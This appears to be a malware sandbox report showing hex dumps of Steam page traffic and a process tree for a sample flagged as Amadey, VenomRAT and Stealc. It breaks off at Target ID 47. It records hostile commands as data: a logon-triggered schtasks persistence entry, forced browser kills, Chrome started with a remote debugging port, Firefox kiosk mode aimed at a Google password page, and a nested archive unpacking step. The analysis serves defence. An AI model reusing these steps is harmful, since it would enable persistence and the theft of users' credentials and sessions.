2024-12-14 23:04:54 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 23:04:54 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 23:04:54 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 23:04:54 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Target ID:	0
Start time:	17:57:00
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x6b0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1729574317.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:57:03
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xae0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1759596074.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:57:03
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xae0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1763794480.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:58:00
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xae0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2324887817.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	17:58:13
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe"
Imagebase:	0xc10000
File size:	1'834'496 bytes
MD5 hash:	6C1D0DABE1EC5E928F27B3223F25C26B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:58:21
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe"
Imagebase:	0x940000
File size:	1'752'576 bytes
MD5 hash:	896C86DB673D2FB674920380E608677B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	17:58:28
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:58:28
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:58:28
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"'
Imagebase:	0xd60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:58:30
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"
Imagebase:	0xce0000
File size:	1'870'848 bytes
MD5 hash:	6255D0D884765ABD3BB418F367CAA8E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:58:39
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe"
Imagebase:	0xb80000
File size:	1'731'584 bytes
MD5 hash:	B5F6786928A8020A227E44E3818EAE5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.3209276748.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3193860810.0000000000C4C000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000003.2710567698.0000000005430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.3193860810.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	17:58:44
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"
Imagebase:	0xce0000
File size:	1'870'848 bytes
MD5 hash:	6255D0D884765ABD3BB418F367CAA8E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:58:46
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe"
Imagebase:	0x90000
File size:	970'752 bytes
MD5 hash:	33E2A0EC0B8839B1DBECB8FC59CEE37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	17:58:48
Start date:	14/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:58:48
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x8b0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:58:48
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	17:58:48
Start date:	14/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2244,i,13816105926383090107,12018060806231782477,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x8b0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x8b0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x8b0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x8b0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	17:58:50
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	17:58:51
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	17:58:51
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	17:58:51
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98e24b6f-d5ed-4478-94c0-894f34eff867} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d752e70310 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	17:58:53
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe"
Imagebase:	0xb80000
File size:	1'731'584 bytes
MD5 hash:	B5F6786928A8020A227E44E3818EAE5E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3250023944.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3244325269.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000003.2853865505.0000000005510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	17:58:56
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe"
Imagebase:	0x6b0000
File size:	2'746'368 bytes
MD5 hash:	3433CA8689FA0A7F4B59713960FBDAAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	17:58:57
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -parentBuildID 20230927232528 -prefsHandle 4300 -prefMapHandle 4304 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a40b55a-69a4-45fc-a0b1-a2c905871959} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d7650bff10 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	17:59:01
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe"
Imagebase:	0x90000
File size:	970'752 bytes
MD5 hash:	33E2A0EC0B8839B1DBECB8FC59CEE37A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	17:59:06
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x8b0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	17:59:06
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	17:59:08
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	17:59:09
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe"
Imagebase:	0x6b0000
File size:	2'746'368 bytes
MD5 hash:	3433CA8689FA0A7F4B59713960FBDAAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	17:59:14
Start date:	14/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff7ad3f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	17:59:14
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	17:59:14
Start date:	14/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff6e1cd0000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	17:59:14
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0x670000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	17:59:15
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0x670000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	17:59:15
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe
Wow64 process (32bit):	true
